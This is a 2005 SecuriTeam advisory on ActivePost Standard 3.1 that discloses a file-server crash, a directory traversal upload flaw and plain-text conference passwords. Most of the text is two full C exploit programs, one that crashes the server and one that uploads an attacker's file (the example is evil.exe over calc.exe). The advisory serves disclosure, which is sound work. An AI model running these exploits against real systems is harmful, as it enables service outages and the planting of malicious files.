[NT] ActivePost Standard Password Disclosure, Directory Traversal and DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05
- Previous message: SecuriTeam: "[NT] YusASP Web Asset Manager Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 4 May 2005 18:32:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ActivePost Standard Password Disclosure, Directory Traversal and DoS
------------------------------------------------------------------------
SUMMARY
<http://www.activepost.net/> ActivePost Standard is an conference
communication program for companies. It is constituited by the clients and
a central server used for login, messaging, chat, files transfer and
conferences. - " <http://www.activepost.net/> ActivePOST is a realtime
messaging system that is combined with Messenger, FileBox, Audio/Video
Conference and interface with GROUPWARE"
Multiple vulnerabilities exists in ActivePOST, exploiting these allows
malicious attacker to gather valuable information about the system and to
cause the program's service to crash.
DETAILS
Vulnerable Systems:
* ActivePost Standard versions 3.1 and prior
Denial of Service:
The file-server runs on port 6004 and is used to upload files on the
server so they can then be downloaded by the target users. The
vulnerability stems from the fact that an attacker is able to crash the
file-server by providing a filename that is longer than 4074 characters.
Directory Traversal:
This is the most critical vulnerability as it lets an attacker to upload
malicious files anywhere in the disk on which ActivePost was installed.
This happens by exploiting a directory traversal bug in the filename.
Example:
The following filename will overwrite the calc.exe file:
/../../../windows/calc.exe
Conference Password Disclosure:
Every time a user enters in the conference menu, the server sends all the
informations of the available rooms including the plain-text passwords of
the conference rooms that are password protected.
The following example data received from the server:
4703 0000 0000 0000 0000 0000 0000 0000 G...............
0000 0000 0a72 6f6f 6d20 7469 746c 6500 .....room title.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0001 3100 ..............1.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0e73 6563 7265 7470 6173 7377 6f72 ...secretpasswor <===
6400 0000 0000 0000 0000 0000 0000 0000 d...............
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0003 3832 ..............82
3100 0000 0000 0000 0000 0000 0000 0000 1...............
0000 0138 0000 0000 0000 0000 0000 0000 ...8............
0000 0000 0000 0017 6465 7363 7269 7074 ........descript
696f 6e20 6f66 2074 6865 2072 6f6f 6d00 ion of the room.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 ....
Proof of Concept:
ActivePost Denial of Service:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/actpboom.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif
#define VER "0.1"
#define PORT 6004
#define BUFFSZ 4104 /* don't modify! */
#define TIMEOUT 3
#define SEND if(send(sd, buff, BUFFSZ, 0) \
< 0) std_err();
#define RECV for(tot = 0; tot < BUFFSZ; tot += len) { \
len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
if(len < 0) std_err(); \
if(!len) break; \
}
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
tot;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"ActivePost File-Server <= 3.1 crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
memset(buff, 0x00, BUFFSZ);
fputs("- send first header\n", stdout);
*(u_long *)buff = 0x1f5;
SEND;
RECV;
fputs("- send filename (BOOM)\n", stdout);
*(u_long *)buff = 0x1f6;
memset(buff + 8, 'a', BUFFSZ - 8);
SEND;
RECV;
memset(buff, 0x00, BUFFSZ);
fputs("- send file data (none)\n", stdout);
*(u_long *)buff = 0x1f8;
SEND;
fputs("- send final header\n", stdout);
*(u_long *)buff = 0x1f9;
SEND;
if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ActivePost Directory Traversal:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/actpup.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif
#define VER "0.1"
#define PORT 6004
#define BUFFSZ 4104 /* don't modify */
#define SEND if(send(sd, buff, BUFFSZ, 0) \
< 0) std_err();
#define RECV for(tot = 0; tot < BUFFSZ; tot += len) { \
len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
if(len < 0) std_err(); \
if(!len) break; \
}
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
struct sockaddr_in peer;
int sd,
len,
tot;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"ActivePost File-Server <= 3.1 traversal file uploader "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 4) {
printf("\nUsage: %s <local_filename> <remote_filename> <server>
[port(%d)]\n"
"\n"
" local_filename is the name of one of your local files that
you wanna put on\n"
" the remote server.\n"
" remote_filename instead is the name you wanna give to the
file and moreover\n"
" the traversal pattern (/..) to reach the desired path on
which to put it.\n"
" Are needed at least 3 patterns to exit from the ActivePost
Server folder,\n"
" like /../../../filename or /..../filename\n"
" However don't worry because the complete real remote path
on which your file\n"
" is saved is EVER visible in the server reply.\n"
"\n"
" Examples:\n"
" %s evil.exe /../../../windows/calc.exe localhost\n"
" %s evil.exe /..../windows/calc.exe localhost\n"
"\n"
" In this case your file evil.exe will overwrite the calc.exe
file of the\n"
" remote host (if ActivePost has been installed in c:\\).\n"
"\n", argv[0], PORT, argv[0], argv[0]);
exit(1);
}
printf("- open local file \"%s\"\n", argv[1]);
fd = fopen(argv[1], "rb");
if(!fd) std_err();
if(argc > 4) port = atoi(argv[4]);
peer.sin_addr.s_addr = resolv(argv[3]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s:%hu\n",
inet_ntoa(peer.sin_addr),
port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
memset(buff, 0x00, BUFFSZ);
fputs("- send first header\n", stdout);
*(u_long *)buff = 0x1f5;
SEND;
RECV;
printf("- send filename (%s)\n", argv[2]);
*(u_long *)buff = 0x1f6;
strncpy(buff + 8, argv[2], BUFFSZ - 8);
SEND;
RECV;
printf("- upload file (%s)\n", argv[1]);
*(u_long *)buff = 0x1f8;
while((len = fread(buff + 8, 1, BUFFSZ - 8, fd))) {
*(u_long *)(buff + 4) = len;
SEND;
}
fclose(fd);
memset(buff, 0x00, BUFFSZ);
fputs("- send final header\n", stdout);
*(u_long *)buff = 0x1f9;
SEND;
RECV;
printf("- remote file has been saved exactly here:\n"
" %s\n", buff + 8);
close(sd);
fputs("- finished\n\n", stdout);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/actp-adv.txt>
http://aluigi.altervista.org
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] YusASP Web Asset Manager Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
